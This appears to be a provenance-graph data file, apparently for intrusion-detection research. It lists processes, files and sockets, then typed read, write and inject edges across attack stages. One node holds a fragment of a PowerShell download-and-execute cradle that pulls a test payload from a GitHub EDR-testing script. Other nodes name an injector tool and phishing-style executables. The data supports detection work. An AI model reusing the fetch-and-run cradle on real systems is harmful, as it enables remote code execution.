22
MP*-chrome.exe 
MF-Users\{90140000-0044-0411-0000-0000000FF1CE}-C\WinRAR.exe
SO-https://mindigital-shde.gr
MP*-where.exe
MF-C:\Program Files\Mozilla Firefox\default
MF-\Users\admin\AppData\Local\Temp\vLocalServerSetup.exe
SF-C:\Users\admin\AppData\Local\Temp\Authenticator
MF-c:\windows\system32\wbem\mofcomp.exe
MF-cscript.exe
MP-Uninstall.exe 
MP*-Ziraat Bankasi Swift Mesaji.exe 
MF-%userprofile%\downloads
SO-https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_
MP-7za.exe
TP-MadInjector\MadInjector.exe 
TP*-rPedidodeOfertadePre__o_USP2307-17BR___pdf.exe 
SO-https://www.bing.com/ck/a?!&&p=1072ef56d1d616adJmltdHM9MTY4ODk0NzIwMCZpZ3VpZD0xZWZiYjU5Yi1jNjViLTYyNmYtMTYxZC1hNmI5YzI1YjZjZmYmaW5zaWQ9NTE5NA&ptn=3&hsh=3&fclid=1efbb59b-c65b-626f-161d-a6b9c25b6cff&psq=blackbyte+ransomware+iocs&u=a1aHR0cHM6Ly93d3cubWljcm9zb2Z0LmNvbS9lbi11cy9zZWN1cml0eS9ibG9nLzIwMjMvMDcvMDYvdGhlLWZpdmUtZGF5LWpvYi1hLWJsYWNrYnl0ZS1yYW5zb213YXJlLWludHJ1c2lvbi1jYXNlLXN0dWR5Lw&ntb=1
MF-C:\Users\admin\AppData\Roaming
MP-B47C.exe
MP-ns9492.tmp 
MF-C:\Users\admin\AppData\Local\Microsoft\EdgeUpdate\Install\{46A0A62B-1F4F-4D54-A968-BB635F8FA37A}\EDGEMITMP_4BF74.tmp
SF-C:\Users\admin\AppData\Local\Temp\znKToHKMQmKzmtaVpk\jsIXhU
59
0 1 RD-1
2 0 RF-1
0 3 FR-1
3 1 WR-2
2 3 RF-2
0 4 RD-1
3 4 CD-2
0 5 RD-1
3 5 RD-2
0 6 WR-1
3 6 WR-2
0 7 CD-1
3 7 WR-2
0 8 CD-1
3 8 RD-2
0 9 FR-1
9 1 RD-2
2 9 RF-2
3 9 UK-2
10 1 WR-3
10 2 ST-3
10 4 RD-3
10 5 RD-3
10 6 WR-3
10 7 WR-3
10 8 WR-3
10 11 WR-3
10 12 ST-3
13 4 WR-3
13 5 RD-3
13 6 WR-3
13 7 RD-3
13 8 WR-3
10 13 UK-3
14 4 WR-3
14 5 WR-3
14 6 RD-3
14 7 WR-3
14 8 WR-3
14 11 UK-3
15 5 RD-4
15 6 RD-4
15 7 RD-4
15 8 RD-4
12 15 RF-3
15 16 ST-4
15 17 WR-4
18 8 RD-4
12 18 RF-3
15 18 IJ-4
18 16 ST-4
18 17 WR-4
19 12 ST-4
15 19 IJ-4
16 19 RF-4
19 17 WR-4
18 19 UK-4
15 20 WR-4
15 21 UK-4

